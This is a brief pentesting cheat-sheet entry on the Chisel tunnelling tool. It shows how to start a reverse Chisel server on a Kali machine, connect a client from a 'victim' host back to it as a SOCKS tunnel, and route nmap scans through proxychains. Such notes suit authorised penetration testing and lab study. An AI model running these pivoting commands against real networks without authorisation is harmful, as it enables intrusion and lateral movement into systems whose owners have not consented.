chisel
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server.
linux_386 windows_386
kali# ./chisel server -p 8000 --reverse
chisel client ip port R:socks vi /etc/proxychains.conf ensure it's socks5 proxy socks5 127.0.0.1 1080
proxchains (prepend before any command) full TCP scan with nmap works & use --top-ports 20
Actual use example: on Kali ./chisel server --host 172.16.40.5 -p 8000 --socks5 --reverse
on victim ./chisel client 172.16.40.5:8000 R:1080:socks
Last updated
Was this helpful?